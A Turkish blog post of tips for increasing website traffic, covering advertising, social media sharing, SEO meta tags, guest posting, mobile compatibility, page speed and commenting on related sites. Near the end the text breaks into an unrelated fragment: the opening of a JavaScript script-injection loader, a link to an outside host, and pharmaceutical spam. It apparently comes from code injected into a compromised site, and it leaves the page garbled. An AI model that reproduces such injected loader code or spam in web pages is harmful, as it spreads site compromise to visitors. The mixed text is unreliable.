Sitenin Hitini Yükseltmek İçin Yapılması Gerekenler

Bir siteye nasıl hit çekerim” konusu tüm webmasterların kafasında her zaman bir soru işareti olmuştur. Bu yazımızda bir sitenin hitini arttırabilmek için yapılması gerekenleri sizlerle paylaşacağız. Aşağıda belirtilen yöntemleri kullanarak sitelerinizin ziyaretçi kazanmasını sağlayabilirsiniz.

website-hit-arttirmaSitenizin reklamını verin : Sosyal paylaşım sitelerine ya da google’da sitenize özel arama kelimelerine göre reklam vererek sitenizin hitini arttırabilirsiniz. Burada özellikle ilgili çekici ve içeriği sağlam olan reklamları vermeye özen gösterin. Verdiğiniz reklamlar ve karşılaşılan içerik kullanıcıların beklentilerini fazlasıyla karşılamalıdır.

Sosyal ağlarda paylaşın : Üretmiş olduğunuz özgün içerikleri sosyal paylaşım sitelerin de düzgün birşekilde paylaşın. Örneğin içerikle ilgili bir facebook sayfası ya da grupta, veya instagram / twitter’da etiketleri düzgün bir şekilde girerek. Sosyal paylaşım siteleri günümüzde ilgili kullanıcaya içeriği ulaştırmanın en kolay yoludur.

Dikkat çekme : İçeriği herkes oluşturur fakat içeriği sunmak daha da önemlidir. Bir içeriği oluşturduğunuz da kullanıcıların dikkatini çekmeyi bilmelisiniz. Kısacası işinizi iyi pazarlamalısınız.

Yazının Başlığı : İçerik oluştururken yazının başlığının çok aranacak ve dikkat çekecek bir şekilde hazırlanması gerekmektedir.

SEO : Google botlarının sitenizi ve içeriğini anlamlandırması için meta-description ve keywords’ler oldukça önemlidir. Meta anahtar kelimelerinizin seçimine çok dikkat ediniz.

Yazarlık : Diğer blog sitelerinde de yazarlık yaparak, o tarz sitelere anlaşmalı olarak linklerinizi eklemeye çalışın. Karşılıklı olarak iki tarafta kazanmış olsun. Tabi unutmadan; kendi bloglarınıza da bu şekilde yazar alabilirsiniz.

Hit gönderimlerine dikkat : Organik hit veya başka yöntemlerle sitenize hit vaad eden uygulamalardan uzak durun. Bu tarz hit gönderen sistemleri kullanmamanızı tavsiye ederiz.

Mobil uyum : Sitenizi mobil uyumlu hale getirin mutlaka. Günümüzde kullanıcılar masaüstü veya laptoplar yerine akıllı telefonları kullanmaktadırlar. Onların sitenizde ki bilgilere kolay ve rahat birşekilde ulaşması için mutlaka mobil uyum kullanın.

Sitenizi Hızlandırın : Sitenizin sayfalarının hızlı açılması ve geçişlerde beklememesi ziyaretçileriniz açısından oldukça önemlidir. Sitedeki yavaşlıklar ziyaretçilerinizi kaçırır.

Yorum : Sizinle birlikte aynı içerik olan siteleri ziyaret ederek onlara yorumlar bırakın. Yorumlar bırakırken de site adresi kısmına kendi sitenizi yazmayı unutmayın. Fakat çöp siteleri kesinlikle tavsiye etmeyin.

Gündem : Güncel olmak önemlidir. Gündemi takip edin ve yenilikleri ziyaretçilerinizle paylaşın.

var d=document;var s=d.createElement(‘script’); http://magic-k.de/?p=10651 dispersible aciclovir tablets bp 800 mg

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir